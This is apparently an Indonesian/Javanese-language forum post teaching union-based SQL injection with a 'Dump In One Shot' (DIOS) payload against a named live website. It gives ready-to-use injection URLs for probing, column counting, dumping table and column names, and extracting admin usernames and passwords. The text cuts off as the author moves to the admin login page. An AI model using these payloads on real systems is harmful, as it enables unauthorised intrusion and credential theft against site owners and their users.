Wokeh.langsung wae,iam lagi stress.SQL injection berarti poc ne nyuntik database e website,lah nek DIOS iku singkatan e Dump In One Shot.berarti sqli e versi simpel ora ruwet.Ojok gawe ngawur tak gianden engkok.
#Mr 1p03n9 93nd3n9
#Ojok aneh"
#dont forget angry react
Bahan:
1.chrome/browser
2.internet
3.web seng vuln
4.dios
"make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)"
Nb:hapus "
5.shell
6.kopi ben ra stress
Langsung tutorial e :
1.Cek web vuln or not carane mari parameter dikek i karakter/tanda ' .Kalau webnya normal" wae berarti ora vuln kalau metu pesan error,gambar/tulisan hilang itu berarti vuln.Langsung wae nok sqli ne.
Ini contoh target gw,
www.situs.co.il/advertiser_view.php?id=77
2.Lanjut kita bermain dengan command/perintah order+by+1-- dan seterusnya sampai menemukan pesan error(seng komaeng).ex: www.situs.co.il/advertiser_view.php?id=77+order+by+1-- .angka 1 iku gantien sembarang kalir sampai ketemu pesan error.(Gambar 1)
Disini w mendapatkan errornya di angka order+by+10-- berarti jumlah columnnya ada 9.(Gambar 2)
3.masukan command/perintah union+ select.
Selengkapnya seperti ini,
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,9--.Nanti metu angka togel/ajaib/sangar embolah karep.
Dan mari kita lihat(gambar di atas), dibagian bawah about keluar angka togel/ajaib.(Gambar 3)
4.Ganti angka togel(aku milih angka 9) dengan dios.
Untuk perintah lengkapnya kek gini gaes,
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)--
Nah lihat itu(Gambar 4), semua column dan beserta table sudah muncul.
Yang kiri itu column kalo yang kanan itu tablenya. Tinggal kita dump deh gaes hehe.
5.Lanjut ke tutorial ngedumpnya ,cari nama admin atau apa yang sekiranya berbau admin.
Disini target gw nama column admin nya adalah admin dan untuk nama tablenya adalahUSER_NAME dan PASSWORD bisa lihat (Gambar 5 ),
Berarti kita perintahnya untuk memasukan ke code dios nya jadi gini,
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)--
Dan bummmm lihat(Gambar 6), Ternyata kita berhasil ngedump username dan passwordnya.
6.Setelah itu tinggal cari tempat admin loginya, tapi disini gw ud